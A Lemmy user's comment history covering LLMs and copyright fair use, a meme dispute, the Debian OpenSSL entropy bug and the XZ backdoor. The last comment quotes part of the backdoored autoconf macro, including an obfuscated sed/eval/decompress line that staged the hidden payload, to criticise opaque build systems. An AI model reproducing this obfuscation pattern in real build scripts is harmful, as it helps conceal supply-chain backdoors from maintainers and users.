• 0 Posts
  • 16 Comments
Joined 1 year ago
Cake day: June 14th, 2023

  • Yeah, you are not gonna be able to do that with an LLM. They will be able to quote only some passages, and only of popular books that have been quoted often enough.

    You entirely ignored this part.

    You basically proved my point in doing so, BTW. You cannot do what you claimed with an LLM. And I’m not saying, nor did I ever say, “ChatGPT” or “OpenAI”. I don’t understand why you think that I might be “defending these hypocritical companies”, when I literally said the opposite at the end.

    You are entirely fooled by the output of ChatGPT and you are not arguing in good faith (or you are entirely unable to understand what I said).

    Edit/addendum: And to stress my point, given that the person I replied to showed the output of ChatGPT as if it were any kind of proof, this is what other LLMs say. This is 4o mini:

    Large Language Models (LLMs) like me do not have the ability to quote whole sections of copyrighted texts verbatim. While I can generate text based on patterns and information learned during training, I do not store or recall specific texts or books. Instead, I can provide summaries, analyses, or discuss themes and concepts related to a book without directly quoting it. If you have a specific topic or question in mind, feel free to ask!

    And this is Llama 3.1 70B:

    Large Language Models (LLMs) can generate text based on the patterns and structures they’ve learned from their training data, which may include books. However, whether they can quote whole sections of a book depends on several factors.

    LLMs are typically trained on vast amounts of text data, including books, articles, and other sources. During training, they learn to recognize patterns, relationships, and context within the text. This allows them to generate text that is similar in style and structure to the training data.

    However, LLMs do not have the ability to memorize or store entire books or sections of text. Instead, they use the patterns and relationships they’ve learned to generate text on the fly.

    That being said, it’s possible for an LLM to generate text that is very similar to a section of a book, especially if the book is well-known or widely available. This can happen in a few ways:

    1. Overlapping patterns: If the book’s writing style, structure, or content is similar to other texts in the training data, the LLM may be able to generate text that resembles a section of the book.
    2. Memorization of key phrases: LLMs may memorize key phrases, quotes, or passages from the training data, which can be recalled and used in generated text.
    3. Contextual generation: If the LLM is given a prompt or context that is similar to a section of the book, it may be able to generate text that is similar in content and style.

    However, it’s unlikely that an LLM can quote a whole section of a book verbatim, especially if the section is long or contains complex or unique content. The generated text may be similar, but it will likely contain errors, omissions, or variations that distinguish it from the original text.

    Feel free to give them a shot at: https://duck.ai



    Now I sail the high seas myself, but I don’t think Paramount Studios would buy anyone’s defence that they were only pirating their movies to learn their general content and produce their own knockoffs.

    We don’t know exactly how they source their data (and that is definitely shady), but if I can gain access to a movie in a legal way, I don’t see why I would not be able to gather statistics from said movie, including running a speech-to-text model to caption it, then computing statistics of how many times certain words were used, and which words followed them. This is an oversimplified explanation of what an LLM does, but it’s the fairest one I can come up with, and it would be legal to do so. The models are always orders of magnitude smaller than the data they are trained on.
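
    To illustrate that oversimplification, here is a minimal sketch in Python, with a made-up caption snippet. This is the toy statistic I describe, not how a real LLM works:

      # Count how often each word is followed by each other word in a
      # (hypothetical) caption transcript. The "model" is just these tallies.
      from collections import Counter, defaultdict

      captions = "I'll be back . I'll be there . be back soon".split()

      follow_counts = defaultdict(Counter)
      for current, following in zip(captions, captions[1:]):
          follow_counts[current][following] += 1

      print(follow_counts["be"])    # Counter({'back': 2, 'there': 1})
      print(follow_counts["I'll"])  # Counter({'be': 2})

    The table of counts is a tiny, transformative summary of the input; scale that idea up enormously and you get the flavor of what training does.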

    That said, I don’t mean to imply that I’m happy with the state of big tech companies, the AI hype, the energy consumption, or the impact on ordinary people. But I’ve put a lot of thought into this (and into learning about machine learning for real), and I think this is not an ML problem, but a problem in the economic, legal and political system. The AI hype is just a symptom.



  • But then it does go on to quote materials verbatim, which shows it’s not “just” ‘extracting patterns’.

    It is just extracting patterns. It is making statistical samples of which token (“word”, informally speaking) is likely to follow a given stream of previous tokens.

    It can only reproduce passages of things it has seen many, many times. It cannot reproduce the whole work. Those two quotes can be seen elsewhere on the internet plenty of times. And it’s fair use there, so it would be fair use with a chat bot as well.
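
    A toy model makes the “seen many, many times” point concrete. In this Python sketch (with made-up sentences), a phrase repeated 50 times in the training text dominates the statistics and is regenerated verbatim, while a continuation seen only once is drowned out:

      from collections import Counter, defaultdict

      famous = "it was the best of times"
      rare = "it was a rare sentence"
      corpus = " . ".join([famous] * 50 + [rare]).split()

      nxt = defaultdict(Counter)
      for a, b in zip(corpus, corpus[1:]):
          nxt[a][b] += 1

      def generate(start, steps):
          out, word = [start], start
          for _ in range(steps):
              word = nxt[word].most_common(1)[0][0]  # likeliest next word
              out.append(word)
          return " ".join(out)

      print(nxt["was"])          # Counter({'the': 50, 'a': 1})
      print(generate("it", 5))   # "it was the best of times", verbatim

    The oft-repeated passage comes out word for word; the sentence seen only once loses at the “was” branch and cannot be recovered this way.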

    There have been papers published where researchers were able to regenerate an image that was present in the training set of Stable Diffusion. But they were only able to find that particular image (and a few others) because they were present in the training set multiple times with the same caption (it was the portrait picture of some company executive).

    when given the book and pages — quote copyrighted works

    Yeah, you are not gonna be able to do that with an LLM. They will be able to quote only some passages, and only of popular books that have been quoted often enough.

    Even if they started to use my service to literally copy entire books?

    You cannot do that with an LLM.

    Why are you defending massive corporations who could just pay up? Isn’t the whole “corporations putting profits over anything” thing a bit… seen already?

    I hate that some corporations are burning money, resources and energy on this, but the solution is not to restrict fair use even further. Machine learning is complex, but if I had to summarize it in some way, it is “just” gathering statistics on which word comes next (in the case of a text model). This is no different from taking a large corpus of text and sampling it for word frequency, letter frequency, N-gram frequency, etc. It is well known that this is fair use. You only store the copyrighted works to run the software, and you produce a very transformative work: a summary many orders of magnitude smaller than the copyrighted works. This is fair use, and it should remain so. Changing that is gonna harm the public, small companies and independent researchers way more than big tech companies.
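
    For a sense of the scales involved, here is a quick Python sketch of exactly those summary statistics, using a synthetic corpus for illustration:

      from collections import Counter

      corpus = "the quick brown fox jumps over the lazy dog . " * 10_000

      letter_freq = Counter(corpus)                 # letter frequency
      words = corpus.split()
      word_freq = Counter(words)                    # word frequency
      bigram_freq = Counter(zip(words, words[1:]))  # 2-gram frequency

      print(len(corpus))                            # 460,000 characters
      print(len(letter_freq), len(word_freq), len(bigram_freq))
      # 28 characters, 9 words, 10 bigrams: the summary is orders of
      # magnitude smaller than the corpus it was sampled from.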

    As I said in another comment, I would very much welcome a way to force big corpos to release their models. Make a model bigger than N parameters? You needed too much fair use in one gulp: your model has to be public, and in the public domain. I would fucking welcome that! But going in the opposite direction is just risky.

    I don’t understand why small individuals think that copyright is their friend, and that it will protect them from big tech companies. Copyright will always harm the weak and protect the powerful as a net result. It’s already a miracle that we can enjoy free software and culture thanks to licenses that leverage copyright in our favor.


    “Theft” is never a technically accurate word when dealing with so-called “intellectual property”, because copying digital content without authorization is legal in tons of cases, and because, come on, property is very explicitly exclusive. I cannot copy my house or my car, but I can make copies of my works for virtually zero cost.

    Using data for training ML models is even explicitly allowed in some jurisdictions (e.g. Japan), and is likely to be fair use everywhere else. LLMs are very transformative, and while they can often produce verbatim copies of fragments of copyrighted works, they don’t store the whole works or significant pieces of them.

    Don’t get me wrong, I don’t like big companies making big money. I would not mind a law that forced models to be open sourced. But restricting their ability to train on public data by curtailing fair use would harm them very little (they could pay something if they are making a profit), while small researchers and companies would never be able to compete, because they could not afford the upfront costs, nor the economic engineering to disguise profits and pay less.


  • Also preemptively deciding that me disagreeing with you automatically makes you right because you predicted your explanation wouldn’t satisfy me is just A-tier bullshit.

    I predicted that I would waste my time by replying to you, and I predicted right.

    I wanted to give it a chance, though, because Lemmy is a place that is friendly enough and that I want to see thrive, despite how little I contribute. I tried to be constructive, explain things the best I could, assume the best possible faith, etc. When you just say that I sound like an asshole, and act in complete bad faith about how Russian roulette is supposed to be read in the context of someone saying “you can beat me at any game”, now I feel the urge to try the block feature in Lemmy, sorry.


    Two people go on a date. The date is going well; there is chemistry between the two. One says “if you beat me at any game we can have sex”. The two will typically play a board or card game, and will flirt with the prospect of sex during the gameplay, which is fun and exciting. It seems like a plot from your average romantic comedy or teen series.

    Now the joke is that the choice of game is stupid, because you end up killing your date. Just with that you could make a meme/joke. The post then doubles down on the stupidity, the insanity, etc., by making it morbid and showing that the guy still had sex with the corpse.

    There it is: my take on the issue, which is unlikely to be the only possible explanation that is not “incel shit”. I’ve wasted 10 minutes of my time, you will likely still not agree with me, and that will prove my first comment right.

    Cheers.


  • suy@programming.dev to Lemmy Shitpost@lemmy.world · Winner’s Luck · 6 months ago

    Has it occurred to you that pressing the downvote button is just much easier than having to bother explaining something that should be obvious?

    If it is not obvious to you that it’s not incel shit, then maybe even after an explanation you still won’t agree, because you have different views (which I’m not saying are not respectable, but they are still different, so an agreement can’t be reached), and whoever replied to you would have wasted their time.

    So of course people downvote without replying.


  • suy@programming.dev to Funny@sh.itjust.works · Holland has so much space · edited · 7 months ago

    Normally, good jokes are also somewhat smart, even when they are not “serious”. A joke about Texas being big is not very smart, IMHO. It’s also not very original, as it’s not the first one I’ve seen in this vein. And above all, it’s especially stupid to end it with a remark like “The European mind cannot comprehend this”, because Europeans know a lot more about the US than US people know about Europe.

    IOW, it’s not that it struck a nerve, it’s that it was legit bad.

    PS: Oh, and the fact that it addresses Europeans makes it sound like it’s about Europe as a whole, which makes it doubly stupid, because then the individual EU members are like US states, and each member/state has routes as long as the one in the original meme.


    I’d have to dig it up, but I think it said that it added the PID and the uninitialized memory to put a bit more data into the entropy pool in a cheap way. I honestly don’t get how that additional data can be helpful. To me it’s the very opposite: the PID and the undefined memory are not as good as quality randomness. So, even without Debian’s intervention, it was a bad idea. The undefined memory triggered Valgrind, and after Debian’s patch, if it weren’t for the PID, all keys would have been reduced to zero randomness, which would probably have raised the alarm much sooner.


  • no more patching fuzzers to allow that one program to compile. Fix the program

    Agreed.

    Remember Debian’s OpenSSL fiasco? The one that affected all the other derivatives as well, including Ubuntu.

    It all started because OpenSSL added a bunch of uninitialized memory and the PID to the entropy pool. Who the hell relies on uninitialized memory, ever? The Debian maintainer wanted to fix the Valgrind errors and submitted a patch upstream. It wasn’t properly reviewed, nor accepted into OpenSSL, so the maintainer added it as a Debian package patch, and everything after that is history.

    Everyone blamed Debian “because it only happened there”, and mistakes were definitely made on that side, but I blame the OpenSSL developers much more.
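
    To see why the result was so catastrophic, here is a small Python sketch (purely illustrative; this is not OpenSSL’s code). If the PID is the only entropy input, and the default pid_max on Linux is 32768, the entire keyspace is small enough to enumerate:

      import random

      def keygen(pid: int) -> str:
          rng = random.Random(pid)  # stand-in for a CSPRNG seeded only by the PID
          return bytes(rng.randrange(256) for _ in range(16)).hex()

      # Every key any affected machine could ever generate:
      all_keys = {keygen(pid) for pid in range(1, 32768)}
      print(len(all_keys))  # 32767 keys: an attacker can precompute them all

    That enumeration is why blacklists of all the vulnerable keys could be published after the bug was disclosed.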


  • suy@programming.dev to Linux@lemmy.ml · XZ backdoor in a nutshell · 8 months ago

    Is it, really? If the whole point of the library is dealing with binary files, how are you even going to have automated tests of the library?

    The scary thing is that there are people still using autotools, or any other hyper-complicated build system where this is easy to hide, because who the hell wants to learn Makefiles, autoconf, automake, M4 and shell scripting all at once just to compile a few C files? I think hiding this in any other build system would have been definitely harder. Check out this mess:

      dnl Define somedir_c_make.
      [$1]_c_make=`printf '%s\n' "$[$1]_c" | sed -e "$gl_sed_escape_for_make_1" -e "$gl_sed_escape_for_make_2" | tr -d "$gl_tr_cr"`
      dnl Use the substituted somedir variable, when possible, so that the user
      dnl may adjust somedir a posteriori when there are no special characters.
      if test "$[$1]_c_make" = '\"'"${gl_final_[$1]}"'\"'; then
        [$1]_c_make='\"$([$1])\"'
      fi
      if test "x$gl_am_configmake" != "x"; then
        gl_[$1]_config='sed \"r\n\" $gl_am_configmake | eval $gl_path_map | $gl_[$1]_prefix -d 2>/dev/null'
      else
        gl_[$1]_config=''
      fi